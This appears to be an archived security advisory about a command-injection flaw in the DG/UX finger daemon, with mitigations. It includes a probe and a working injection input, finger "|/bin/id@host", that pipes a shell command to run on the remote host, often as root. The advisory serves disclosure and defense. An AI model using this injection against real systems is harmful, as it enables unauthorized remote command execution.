Vulnerability
in.fingerd
Affected
DGUX
Description
George Imburgia posted about another old bug that won't die. The
finger daemon that ships with dgux will allow a remote user to
pipe commands, often with uid root or bin.
To check for this vulnerability, simply use the RFC compliant
syntax;
finger /W@host
If it returns something like this, it may be vulnerable;
Login name: /W In real life: ???
To see the uid in.fingerd is running as, try this;
finger "|/bin/id@host"
Often, you will see something like this;
uid=0(root) gid=0(root)
or;
uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)
Solution
1) disable fingerd,
2) use tcpwrappers, and have a wrapper program check for the
offending pipe and other shell specials,
3) find a third party fingerd that DOESN'T have this wide open
door to root.
Apparently it's fixed in MU03. DG/UX is officially up to 4.11MU04
with 4.20 coming soon.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH